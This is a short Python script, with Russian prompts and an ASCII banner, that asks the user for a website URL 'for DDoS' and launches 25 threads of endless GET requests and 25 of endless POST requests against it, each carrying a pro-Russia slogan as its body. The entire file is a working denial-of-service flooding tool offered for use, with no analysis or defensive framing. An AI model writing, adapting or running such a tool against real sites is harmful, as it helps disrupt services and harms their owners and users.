import requests
import threading 
print("\033[33m"'██████╗░██╗░░░██╗  ██╗░░██╗██████╗░███████╗░█████╗░██╗░░░░░')
print('██╔══██╗╚██╗░██╔╝  ██║░██╔╝██╔══██╗██╔════╝██╔══██╗██║░░░░░')
print('██████╦╝░╚████╔╝░  █████═╝░██████╔╝█████╗░░██║░░██║██║░░░░░')
print('██╔══██╗░░╚██╔╝░░  ██╔═██╗░██╔══██╗██╔══╝░░██║░░██║██║░░░░░')
print('██████╦╝░░░██║░░░  ██║░╚██╗██║░░██║███████╗╚█████╔╝███████╗')
print('╚═════╝░░░░╚═╝░░░  ╚═╝░░╚═╝╚═╝░░╚═╝╚══════╝░╚════╝░╚══════╝')
text = "/Glory&to&Russia&and&its&Russian&people/"
url = input('Введите ссылку на сайт для ддоса: ')
i = 0
def DdosGet():
  try:
   while i < 1:
      DdosGR = requests.get(url, data=text)
      if(DdosGR.status_code == 200):
         print("\033[32m"'GET запрос отправлен')
      else:
        print("\033[31m"'GET запрос не отправлен')
  except: print("\033[31m"'Возникла ошибка GET запроса')


def DdosPost():
  try:
   while i < 1:
     DdosRP = requests.post(url, data=text)
     if(DdosRP.status_code == 200):
        print("\033[36m"'POST запрос отправлен')
     else:
      print("\033[31m"'POST запрос не отправлен')
  except: print("\033[31m"'Возникла ошибка POST запроса')

thr1 = threading.Thread(target = DdosGet)
thr2 = threading.Thread(target = DdosGet)
thr3 = threading.Thread(target = DdosGet)
thr4 = threading.Thread(target = DdosGet)
thr5 = threading.Thread(target = DdosGet)
thr6 = threading.Thread(target = DdosGet)
thr7 = threading.Thread(target = DdosGet)
thr8 = threading.Thread(target = DdosGet)
thr9 = threading.Thread(target = DdosGet)
thr10 = threading.Thread(target = DdosGet)
thr11 = threading.Thread(target = DdosGet)
thr12 = threading.Thread(target = DdosGet)
thr13 = threading.Thread(target = DdosGet)
thr14 = threading.Thread(target = DdosGet)
thr15 = threading.Thread(target = DdosGet)
thr16 = threading.Thread(target = DdosGet)
thr17 = threading.Thread(target = DdosGet)
thr18 = threading.Thread(target = DdosGet)
thr19 = threading.Thread(target = DdosGet)
thr20 = threading.Thread(target = DdosGet)
thr21 = threading.Thread(target = DdosGet)
thr22 = threading.Thread(target = DdosGet)
thr23 = threading.Thread(target = DdosGet)
thr24 = threading.Thread(target = DdosGet)
thr25 = threading.Thread(target = DdosGet)
thr1.start()
thr2.start()
thr3.start()
thr4.start()
thr5.start()
thr6.start()
thr7.start()
thr8.start()
thr9.start()
thr10.start()
thr11.start()
thr12.start()
thr13.start()
thr14.start()
thr15.start()
thr16.start()
thr17.start()
thr18.start()
thr19.start()
thr20.start()
thr21.start()
thr22.start()
thr23.start()
thr24.start()
thr25.start()
thr1p = threading.Thread(target = DdosPost)
thr2p = threading.Thread(target = DdosPost)
thr3p = threading.Thread(target = DdosPost)
thr4p = threading.Thread(target = DdosPost)
thr5p = threading.Thread(target = DdosPost)
thr6p = threading.Thread(target = DdosPost)
thr7p = threading.Thread(target = DdosPost)
thr8p = threading.Thread(target = DdosPost)
thr9p = threading.Thread(target = DdosPost)
thr10p = threading.Thread(target = DdosPost)
thr11p = threading.Thread(target = DdosPost)
thr12p = threading.Thread(target = DdosPost)
thr13p = threading.Thread(target = DdosPost)
thr14p = threading.Thread(target = DdosPost)
thr15p = threading.Thread(target = DdosPost)
thr16p = threading.Thread(target = DdosPost)
thr17p = threading.Thread(target = DdosPost)
thr18p = threading.Thread(target = DdosPost)
thr19p = threading.Thread(target = DdosPost)
thr20p = threading.Thread(target = DdosPost)
thr21p = threading.Thread(target = DdosPost)
thr22p = threading.Thread(target = DdosPost)
thr23p = threading.Thread(target = DdosPost)
thr24p = threading.Thread(target = DdosPost)
thr25p = threading.Thread(target = DdosPost)
thr1p.start()
thr2p.start()
thr3p.start()
thr4p.start()
thr5p.start()
thr6p.start()
thr7p.start()
thr8p.start()
thr9p.start()
thr10p.start()
thr11p.start()
thr12p.start()
thr13p.start()
thr14p.start()
thr15p.start()
thr16p.start()
thr17p.start()
thr18p.start()
thr19p.start()
thr20p.start()
thr21p.start()
thr22p.start()
thr23p.start()
thr24p.start()
thr25p.start()